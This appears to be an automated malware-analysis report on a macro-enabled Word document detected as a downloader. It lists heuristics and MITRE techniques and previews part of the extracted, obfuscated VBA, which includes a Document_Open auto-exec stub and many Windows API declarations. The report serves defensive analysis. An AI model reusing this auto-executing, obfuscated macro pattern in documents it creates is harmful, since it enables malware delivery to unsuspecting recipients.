MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
This OOXML document contains a VBA project with a Document_Open macro that executes obfuscated code. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, which is likely used to download and execute a second-stage payload. The ClamAV detection further confirms its malicious nature as a downloader. The VBA code itself is heavily obfuscated and truncated, preventing a more detailed analysis of its specific actions.
Heuristics 6
-
ClamAV: Doc.Downloader.Generic-8011192-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-8011192-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 48020 bytes |
SHA-256: 43c9ad5f3ce814626c1fb963420b9fe097f0184b606bd1b7e2d2ac434810cda6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
hsdfjh34j5k.ncjjkj34SD4
End Sub
Attribute VB_Name = "hsdfjh34j5k"
Private Type DSFG36SDFGsfj2bhnkijb345
dsgf4 As Long
dg43t4 As String
hj56y As Long
' nbk54 As Long
' ngi24 As Long
dwXCars As Long
cerved2 As Integer
htput As Long
hror As Long
End Type
Private Type DFG546CV345rpaoisdfgi34
hess As Long
' ead As Long
ocessD As Long
hPrss As Long
hhad As Long
deadI As Long
End Type
#If VBA7 Then
Declare PtrSafe Function ActivateKeyboardLayout Lib "user32" (ByVal fkjn54lk4nlws As LongPtr, ByVal cbkjwhefkjhv4j3rhvw As LongPtr) As LongPtr
Declare PtrSafe Function AnyPopup Lib "user32" () As LongPtr
Declare PtrSafe Function AttachThreadInput Lib "user32" (ByVal idAttach As LongPtr, ByVal idAttachTo As LongPtr, ByVal fAttach As LongPtr) As LongPtr
Declare PtrSafe Function BeginDeferWindowPos Lib "user32" (ByVal nNumWindows As LongPtr) As LongPtr
Declare PtrSafe Function CloseWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function CopyIcon Lib "user32" (ByVal hIcon As LongPtr) As LongPtr
Declare PtrSafe Function CopyImage Lib "user32" (ByVal Handle As LongPtr, ByVal un1 As LongPtr, ByVal n1 As LongPtr, ByVal n2 As LongPtr, ByVal un2 As LongPtr) As LongPtr
Declare PtrSafe Function CountClipboardFormats Lib "user32" () As LongPtr
Declare PtrSafe Function CreateCaret Lib "user32" (ByVal hWnd As LongPtr, ByVal hBitmap As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr) As LongPtr
Declare PtrSafe Function CreateIcon Lib "user32" (ByVal hsdfkjo3lw4h5o3ghkijfs As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal nPlanes As Byte, ByVal nBitsPixel As Byte, lpANDbits As Byte, lpXORbits As Byte) As LongPtr
'Declare PtrSafe Function CreateIconFromResource Lib "user32" (presbits As Byte, ByVal dwResSize As LongPtr, ByVal fIcon As LongPtr, ByVal dwVer As LongPtr) As LongPtr
'Declare PtrSafe Function CreateMDIWindow Lib "user32" Alias "CreateMDIWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hWndParent As LongPtr, ByVal hInstance As LongPtr, ByVal lParam As LongPtr) As LongPtr
'Declare PtrSafe Function CreateMenu Lib "user32" () As LongPtr
'Declare PtrSafe Function CreatePopupMenu Lib "user32" () As LongPtr
'Declare PtrSafe Function CreateWindow Lib "user32" Alias "CreateWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hWndParent As LongPtr, ByVal hMenu As LongPtr, ByVal hInstance As LongPtr, lpParam As Any) As LongPtr
'Declare PtrSafe Function DdeAddData Lib "user32" Alias "DdeAddDataA" (ByVal hData As LongPtr, pSrc As Byte, ByVal cb As LongPtr, ByVal cbOff As LongPtr) As LongPtr
'Declare PtrSafe Function DdeClientTransaction Lib "user32" (pData As Byte, ByVal cbData As LongPtr, ByVal hConv As LongPtr, ByVal hszItem As LongPtr, ByVal wFmt As LongPtr, ByVal wType As LongPtr, ByVal dwTimeout As LongPtr, pdwResult As LongPtr) As LongPtr
'Declare PtrSafe Function DdeDisconnect Lib "user32" (ByVal hConv As LongPtr) As LongPtr
'Declare PtrSafe Function DdeDisconnectList Lib "user32" (ByVal hConvList As LongPtr) As LongPtr
'Declare PtrSafe Function DdeEnableCallback Lib "user32" (ByVal idInst As LongPtr, ByVal hConv As LongPtr, ByVal wCmd As LongPtr) As LongPtr
'Declare PtrSafe Function DdeFreeDataHandle Lib "user32" (ByVal hData As LongPtr) As LongPtr
'Declare PtrSafe Function DdeFreeStringHandle Lib "user32" (ByVal idInst As LongPtr, ByVal hsz As LongPtr) As LongPtr
'Declare PtrSafe Function DdeGetDat
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 153088 bytes |
SHA-256: 0c5d6c5d860d97cb70b151f3382d396798b88b167abd51be43954a15f7785777 |
|||
|
Detection
ClamAV:
Doc.Downloader.Generic-8011192-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.